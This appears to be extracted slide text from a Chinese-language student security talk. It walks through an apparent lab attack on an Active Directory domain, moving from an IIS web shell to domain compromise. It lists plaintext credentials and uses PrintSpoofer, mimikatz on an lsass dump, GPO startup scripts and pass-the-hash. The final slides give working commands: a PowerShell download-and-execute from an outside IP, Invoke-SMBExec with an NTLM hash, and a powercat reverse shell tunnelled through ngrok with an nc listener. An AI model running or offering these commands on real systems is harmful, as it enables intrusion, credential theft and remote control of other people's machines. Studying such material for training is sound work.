GSS 叡揚資訊實習生 / 輔大資工四乙
AIS3 教育部資訊安全培訓計畫
2019, 2020 成員
SITCON (學生計算機年會)
HITCON (台灣駭客年會)
mail@halloworldis.me
william31212@gmail.com
blog.halloworldis.me
william31212
@halloworlddddd
halloworld
復刻而成
我們來回憶寒假
野生的IIS
你
野生的IIS
web權限
系統權限
Admin
PrintSpoofer.exe
瀏覽網站
傳shell
Dump SAM, SYSTEM
掛proxychain
野生的IIS
OP
CrackMapExec.exe
OA
AD
OP
Administrator:1qaz@WSX3edc
OP
Administrator:1qaz@WSX3edc
Mimikatz.exe
OP
Administrator:1qaz@WSX3edc
nisra:maggievTNBz@
然後我還是不知道怎麼解
OP
Administrator:1qaz@WSX3edc
nisra:maggievTNBz@
OA
AD
csie.fju.edu.tw
Joseph
加入網域的電腦,可以用網域帳號登入
Mei
王國滑的電腦
Dr. yeh
csie.fju.edu.tw
Mei
Dr. yeh
我可以用Mei的帳號
登Dr.yeh的電腦
網域登入
NISRA\nisra
同一台網域下的電腦,可以用網域帳號或本地帳號登入
本地登入
.\Administrator
主機名稱\Administrator
OP
Administrator:1qaz@WSX3edc
nisra:maggievTNBz@
登OA
因為他是domain user
OA
proxychains xfreerdp /v:192.168.232.30:3389
/u:nisra /p:maggievTNBz@
//不用換行,我是因為秀在投影片上面我才換行
xfreeRDP
只能讓一個人活著
講一下原理
野生的IIS
OP
OA
AD
RDP
RDP
Your server
Portmap
6666->3389
可愛的你用
只能一個人,只能一個人,還是只能一個人
OA
黑魔法
教你另一招,反正就是透過IIS把OA ㄉ RDP幹出來
然後去載windows ngrok.exe
1. 壓縮 ngrok
2. 用IIS上的 powershell 解壓縮
/c powershell -command "Expand-Archive
C:\inetpub\wwwroot\Custom\Themes\RCE\ngrok.zip
C:\inetpub\wwwroot\Custom\Themes\RCE\a"
OA
跟他討
3389
野生的IIS
打到美國去
Admin在哪 ?
Admin在哪 ?
Admin
在哪啦幹
群組原則管理
群組原則(英語:Group Policy)是微軟Windows NT家族作業系統的一個特性,它可以控制使用者帳戶和電腦帳戶的工作環境。群組原則提供了作業系統、應用程式和Active Directory中使用者設定的集中化管理和組態。群組原則的其中一個版本名為本機群組原則(縮寫「LGPO」或「LocalGPO」),這可以在獨立且非域的電腦上管理群組原則物件。
\\nisra.com\SYSVOL\nisra.com\Policies\{19FC6EB1-E646.....}\Machine\Script\Startup
OP
Administrator:1qaz@WSX3edc
nisra:maggievTNBz@
OA
AD
Pwned!!!
Pwned!!!
野生的IIS
Pwned!!!
路過的痕跡
你要怎麼上mimikatz呢
拿到 lsass.dmp,拿到本機用mimikatz.exe破解
1. cmd管理員權限版本
2. 拿你剛剛熱騰騰的admin驗證
3. 輸入taskmgr
然後用本機mimikatz.exe爆
務必小心,你會有這種感覺
# 透過 minidump 獲取資訊
Sekurlsa::minidump “/To/PATH/lsass.dmp”
Sekurlsa::logonPasswords
Pass The Hash...
OP
Administrator:1qaz@WSX3edc
nisra:maggievTNBz@
OA
AD
Pwned!!!
Pwned!!!
野生的IIS
Pwned!!!
Pass The Hash
因為proxychains不行,果斷放棄
因為我懶,我直接用AIS3的投影片
我用了剛剛OA的RDP裡的CMD,結果也失敗???
他就卡在這,別懷疑你的眼睛
# 關閉 ssl 保護(沒有換行,沒有換行,真的沒有換行)
[System.Net.ServicePointManager]::ServerCertificateValidationCallback =
{$true};
# Load Script(沒有換行,沒有換行,真的沒有換行)
IEX(New-Object System.Net.WebClient).DownloadString("
https://35.201.144.177/Invoke-SMBExec.ps1");
# SMB執行命令(沒有換行,沒有換行,真的沒有換行)
Invoke-SMBExec -Target <IP> -Domain <Domain> -Username <Username> -Hash
<Hash> -Command '<命令>' -verbose
# 關閉 ssl 保護(沒有換行,沒有換行,真的沒有換行)
[System.Net.ServicePointManager]::ServerCertificateValidationCallback =
{$true};
# Load Script(沒有換行,沒有換行,真的沒有換行)(防毒要關)
IEX(New-Object System.Net.WebClient).DownloadString("
https://35.201.144.177/Invoke-SMBExec.ps1");
# SMB執行命令(沒有換行,沒有換行,真的沒有換行)
Invoke-SMBExec -Target <IP> -Domain <Domain> -Username <Username> -Hash
<Hash> -Command '<命令>' -verbose
Invoke-SMBExec -Target 192.168.232.87 -Domain
nisra.com -Username kingofnisra -Hash
efa85b42d77dc2fdbdbdb767792b0a11 -Command
'powershell -c
" [System.Net.ServicePointManager]::ServerCertificateVali
dationCallback = {$true}; IEX(New-Object System.Net.WebClient).DownloadString(\"https://
35.201.144.177/powercat.ps1\");powercat -c
o.chesskuo.tw -p 8787 -e cmd"' -verbose
你有admin可以關他哦,動動你的小指頭
Invoke-SMBExec -Target 192.168.232.87 -Domain
nisra.com -Username kingofnisra -Hash
efa85b42d77dc2fdbdbdb767792b0a11 -Command
'powershell -c
" [System.Net.ServicePointManager]::ServerCertificateVali
dationCallback = {$true}; IEX(New-Object
System.Net.WebClient).DownloadString(\"https://
35.201.144.177/powercat.ps1\");powercat -c
0.tcp.ap.ngrok.io -p 16576 -e cmd"' -verbose
ngrok tcp 8787
nc -nvlp 8787